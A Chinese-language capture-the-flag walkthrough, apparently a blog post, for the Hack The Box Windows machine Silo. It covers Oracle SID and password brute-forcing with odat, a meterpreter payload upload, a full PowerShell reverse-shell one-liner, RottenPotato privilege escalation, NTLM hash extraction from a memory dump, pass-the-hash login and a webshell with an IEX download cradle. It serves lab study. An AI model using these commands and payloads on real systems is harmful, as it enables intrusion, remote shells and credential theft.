HTB靶场系列 Windows靶机 Slio靶机
作者:互联网
这台机器涉及到了oracle数据库,之前完全没有涉猎过,借此机会也是熟悉了一下这个数据库的操作方法;以及涉及到了关于内存取证方面的知识,正好上一次在美亚杯只是粗浅的学习了一下取证大师,则此也是借此机会好好的学习了一下取证相关知识
勘探
nmap -sC -sV 10.10.10.82
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-09 13:15 CST
Nmap scan report for 10.10.10.82
Host is up (0.073s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49159/tcp open oracle-tns Oracle TNS listener (requires service name)
49160/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-02-09T05:17:36
|_ start_date: 2021-02-09T03:07:49
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 152.90 seconds
可以看出来80端口开了iis8.5,搜索一下没有可以利用的漏洞,应该是个兔子洞
135,和五位数都是rpc没有可以利用漏洞
rpcclient -U '' 10.10.10.82
Enter WORKGROUP\'s password:
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
139和445可以看出对方系统的,并且共享文件夹中也没有东西
$smbclient -L //$ip/
Enter WORKGROUP\chris's password:
session setup failed: NT_STATUS_ACCESS_DENIED
┌─[root@kali]─[~]
└──╼ $smbmap -H $ip
[!] 445 not open on 10.10.10.82....
1521是oracle-tns Oracle TNS listener这个是一个Oracle数据库的监听端口,有一个可以利用的漏洞
获取system权限
方法一
这种方法不需要获取www权限
首先安装odat,直接在kali中打odat然后就会自动开始安装
然后开始利用
~ odat sidguesser -s 10.10.10.82
[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'XE' is a valid SID. Continue... ########## | ETA: 00:00:01
[+] 'XEXDB' is a valid SID. Continue...
100% |#######################################################| Time: 00:02:22
[1.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.10.10.82:1521)
100% |#######################################################| Time: 00:00:05
[1.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.10.10.82:1521)
[+] 'XE' is a valid SID. Continue... #### | ETA: 00:00:15
100% |#######################################################| Time: 00:02:22
[+] SIDs found on the 10.10.10.82:1521 server: XE,XEXDB
发现了两个可用的sid,经过试验可用的是XE
同样这一步可以使用msf来对sid进行猜测
use scanner/oracle/sid_enum记得换一个大一点的字典
”/usr/share/metasploit-framework/data/wordlists/sid.txt“
用户密码爆破
然后爆破用户名密码:
➜ ~ sudo odat passwordguesser -s 10.10.10.82 -p 1521 -d XE --accounts-file /usr/share/odat/accounts/accounts_small.txt
[+] Valid credentials found: scott/tiger. Continue...
然后我还看到了一种odat其他的用法
过后我会在研究odat的文章中再详细学习和解释
odat all -s 10.10.10.82 -p 1521 -d XE
--snipped--
+] Valid credentials found: scott/tiger. Continue...
--snipped--
还有一个0xdf大佬自己编写的爆破密码的脚本HTB: Silo | 0xdf hacks stuff
#!/usr/bin/env python
import cx_Oracle
import sys
from multiprocessing import Pool
MAX_PROC = 50
host = "10.10.10.82"
sid = "XE"
def usage():
print("{} [ip] [wordlist]".format(sys.argv[0]))
print(" wordlist should be of the format [username]:[password]")
sys.exit(1)
def scan(userpass):
u, p = userpass.split(':')[:2]
try:
conn = cx_Oracle.connect('{user}/{pass_}@{ip}/{sid}'.format(user=u, pass_=p, ip=host, sid=sid))
return u, p, True
except cx_Oracle.DatabaseError:
return u, p, False
def main(host, userpassfile, nprocs=MAX_PROC):
with open(userpassfile, 'r') as f:
userpass = f.read().rstrip().replace('\r','').split('\n')
pool = Pool(processes=nprocs)
for username, pass_, status in pool.imap_unordered(scan, [up for up in userpass]):
if status:
print("Found {} / {}\n\n".format(username, pass_))
else:
sys.stdout.write("\r {}/{} ".format(username, pass_))
if __name__ == '__main__':
if len(sys.argv) != 3:
usage()
main(sys.argv[1], sys.argv[2])
数据库里没什么东西,这里用的是上传恶意文件执行:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.14.5 lport=4445 -f exe > 1.exe
odat utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --putFile c:/ 1.exe ~/1.exe
odat externaltable -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --exec c:/ 1.exe
执行脚本前记得用msf打开监听
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.10.16.7
lhost => 10.10.16.7
msf6 exploit(multi/handler) > set lport 4445
lport => 4445
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.16.7:4445
[*] Sending stage (200262 bytes) to 10.10.10.82
[*] Meterpreter session 1 opened (10.10.16.7:4445 -> 10.10.10.82:49167) at 2022-01-05 14:24:14 +0800
就行了
方法二
用odat直接读取文件
odat ctxsys -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba --getFile c:\\users\\administrator\\desktop\\root.txt
[1] (10.10.10.82:1521): Read the c:\users\administrator\desktop\root.txt file on the 10.10.10.82 server
[+] Data stored in the c:\users\administrator\desktop\root.txt file (escape char replace by '\n'):
82FDAB14799E467FCE23979F9C1BF92C
方法三
感谢0xdf的思路
当我们在一个普通权限下通过whoami /priv发现SeImpersonatePrivilege证明我们可以使用RottenPotato提权
PS C:\windows\system32\inetsrv>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
我们下载MSFRottenPotato.exeGitHub - decoder-it/juicy-potato: A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITYSYSTEM.
然后编译一个bat文件
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.14',8085); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){ ;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (IEX $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}; $client.Close()"
然后下载
PS C:\temp> (new-object net.webclient).downloadfile('http://10.10.14.14:8083/rev.bat', 'C:\temp\rev.bat')
PS C:\temp> (new-object net.webclient).downloadfile('http://10.10.14.14:8083/MSFRottenPotato.exe', 'C:\temp\lp.exe')
之后运行脚本
PS C:\temp> c:\temp\lp.exe * \temp\rev.bat
connect sock
CreateIlok: 0 0
start RPC connection
CreateDoc: 0 0
COM -> bytes received: 116
RPC -> bytes Sent: 116
RPC -> bytes received: 84
COM -> bytes sent: 84
COM -> bytes received: 24
RPC -> bytes Sent: 24
RPC -> bytes received: 132
COM -> bytes sent: 132
COM -> bytes received: 127
RPC -> bytes Sent: 127
RPC -> bytes received: 196
COM -> bytes sent: 196
COM -> bytes received: 243
RPC -> bytes Sent: 243
RPC -> bytes received: 192
COM -> bytes sent: 192
COM -> bytes received: 72
RPC -> bytes Sent: 72
RPC -> bytes received: 60
COM -> bytes sent: 60
COM -> bytes received: 42
RPC -> bytes Sent: 42
RPC -> bytes received: 56
COM -> bytes sent: 56
CoGet: -2147022986 0
[+] authresult != -1
[+] Elevated Token tye:2
[+] DuplicateTokenEx :1 0
[+] Duped Token type:1
[+] Running \temp\rev.bat sessionId 1
[+] CreateProcessWithTokenW OK
Auth result: 0
Return code: 0
Last error: 0
记得打开nc监听
root@kali:~/hackthebox/silo-10.10.10.82# nc -lnvp 8085
listening on [any] 8085 ...
connect to [10.10.14.14] from (UNKNOWN) [10.10.10.82] 49181
PS C:\Windows\system32> whoami
nt authority\system
方法四
在用户的桌面上我们会发现不止有flag还有一个issue.txt文件
dir \users\Phineas\Desktop
Directory: C:\users\Phineas\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 1/5/2018 10:56 PM 300 Oracle issue.txt
-a--- 1/4/2018 9:41 PM 32 user.txt
打开后发现文件中写了,内存备份文件存放在网盘里,密码也有
Support vendor engaged to troubleshoot Windows / Oracle performance issue (full memory dump requested):
Dropbox link provided to vendor (and password under separate cover).
Dropbox link
https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0
link password:
£%Hm8646uC$
那么下载下来用volatility来尝试内存取证
volatility kdbgscan -f SILO-20180105-221806.dmp
**************************************************
Instantiating KDBG using: Unnamed AS Win2012R2x64_18340 (6.3.9601 64bit)
Offset (V) : 0xf80078520a30
Offset (P) : 0x2320a30
KdCopyDataBlock (V) : 0xf8007845f9b0
Block encoded : Yes
Wait never : 0xd08e8400bd4a143a
Wait always : 0x17a949efd11db80
KDBG owner tag check : True
Profile suggestion (KDBGHeader): Win2012R2x64_18340
Version64 : 0xf80078520d90 (Major: 15, Minor: 9600)
Service Pack (CmNtCSDVersion) : 0
Build string (NtBuildLab) : 9600.16384.amd64fre.winblue_rtm.
PsActiveProcessHead : 0xfffff80078537700 (51 processes)
PsLoadedModuleList : 0xfffff800785519b0 (148 modules)
KernelBase : 0xfffff8007828a000 (Matches MZ: True)
Major (OptionalHeader) : 6
Minor (OptionalHeader) : 3
KPCR : 0xfffff8007857b000 (CPU 0)
KPCR : 0xffffd000207e8000 (CPU 1)
**************************************************
...
之后尝试获得账号的hash
volatility -f SILO-20180105-221806.dmp --profile Win2012R2x64 hivelist
Volatility Foundation Volatility Framework 2.6
Virtual Physical Name
------------------ ------------------ ----
0xffffc0000100a000 0x000000000d40e000 \??\C:\Users\Administrator\AppData\Local\Microsoft\Windows\UsrClass.dat
0xffffc000011fb000 0x0000000034570000 \SystemRoot\System32\config\DRIVERS
0xffffc00001600000 0x000000003327b000 \??\C:\Windows\AppCompat\Programs\Amcache.hve
0xffffc0000001e000 0x0000000000b65000 [no name]
0xffffc00000028000 0x0000000000a70000 \REGISTRY\MACHINE\SYSTEM
0xffffc00000052000 0x000000001a25b000 \REGISTRY\MACHINE\HARDWARE
0xffffc000004de000 0x0000000024cf8000 \Device\HarddiskVolume1\Boot\BCD
0xffffc00000103000 0x000000003205d000 \SystemRoot\System32\Config\SOFTWARE
0xffffc00002c43000 0x0000000028ecb000 \SystemRoot\System32\Config\DEFAULT
0xffffc000061a3000 0x0000000027532000 \SystemRoot\System32\Config\SECURITY
0xffffc00000619000 0x0000000026cc5000 \SystemRoot\System32\Config\SAM
0xffffc0000060d000 0x0000000026c93000 \??\C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT
0xffffc000006cf000 0x000000002688f000 \SystemRoot\System32\Config\BBI
0xffffc000007e7000 0x00000000259a8000 \??\C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT
0xffffc00000fed000 0x000000000d67f000 \??\C:\Users\Administrator\ntuser.dat
root@kali:~/hackthebox/silo-10.10.10.82# volatility -f SILO-20180105-221806.dmp --profile Win2012R2x64 hashdump -y 0xffffc00000028000 -s 0xffffc00000619000
Volatility Foundation Volatility Framework 2.6
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Phineas:1002:aad3b435b51404eeaad3b435b51404ee:8eacdd67b77749e65d3b3d5c110b0969:::
最后尝试用psexec用hash登录
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 -target-ip 10.10.10.82
administrator@10.10.10.82
Impacket v0.9.16-dev - Copyright 2002-2018 Core Security Technologies
[*] Requesting shares on 10.10.10.82.....
[*] Found writable share ADMIN$
[*] Uploading file XryxqKFr.exe
[*] Opening SVCManager on 10.10.10.82.....
[*] Creating service PAYb on 10.10.10.82.....
[*] Starting service PAYb.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
后渗透
这里因为我由于直接利用了odat脚本,所以在渗透过程中甚至拿到了数据库的账号密码也没有登进去看看,这里在整理笔记的时候看看别人的思路整理了一份,登录数据库的步骤(我的机器里甚至没有安装oracle,后期在安装数据库的时候真的是特别痛苦)
数据库探查
在HTB: Silo - PurpleRabbit这篇文章中,讲解了,不需要安装oracle数据库,只需要使用sqlplus就可以登陆进去的方法,我这里先写一下它的方法
sqlplus scott/tiger@$10.10.10.84:1521/XE
SQL> select table_name from user_tables;
TABLE_NAME
------------------------------
DEPT
EMP
BONUS
SALGRADE
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT CONNECT NO YES NO
SCOTT RESOURCE NO YES NO
发现他数据库里没什么东西
获取www权限
思路来源于0xdf
通过
root@kali:~/hackthebox/silo-10.10.10.82# odat dbmsadvisor -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba --putFile C:\\inetpub\\wwwroot 0xdf.aspx /usr/share/webshells/aspx/cmdasp.aspx
[1] (10.10.10.82:1521): Put the /usr/share/webshells/aspx/cmdasp.aspx local file in the C:\inetpub\wwwroot path (named 0xdf.aspx) of the 10.10.10.82 server
[+] The /usr/share/webshells/aspx/cmdasp.aspx local file was put in the remote C:\inetpub\wwwroot path (named 0xdf.aspx)
上传一个web命令执行脚本,然后通过之前的iis8.5来执行
然后我们通过这个命令行来远程下载我们的shell转发脚本
在本地打开web服务
python -m SimpleHTTPServer 80
然后在命令行
powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.15.48:80/Invoke-PowerShellTcp.ps1')
获得一个转发shell
标签:HTB,Windows,bytes,tcp,10.82,RPC,10.10,靶机 来源: https://blog.csdn.net/m0_57221101/article/details/122722260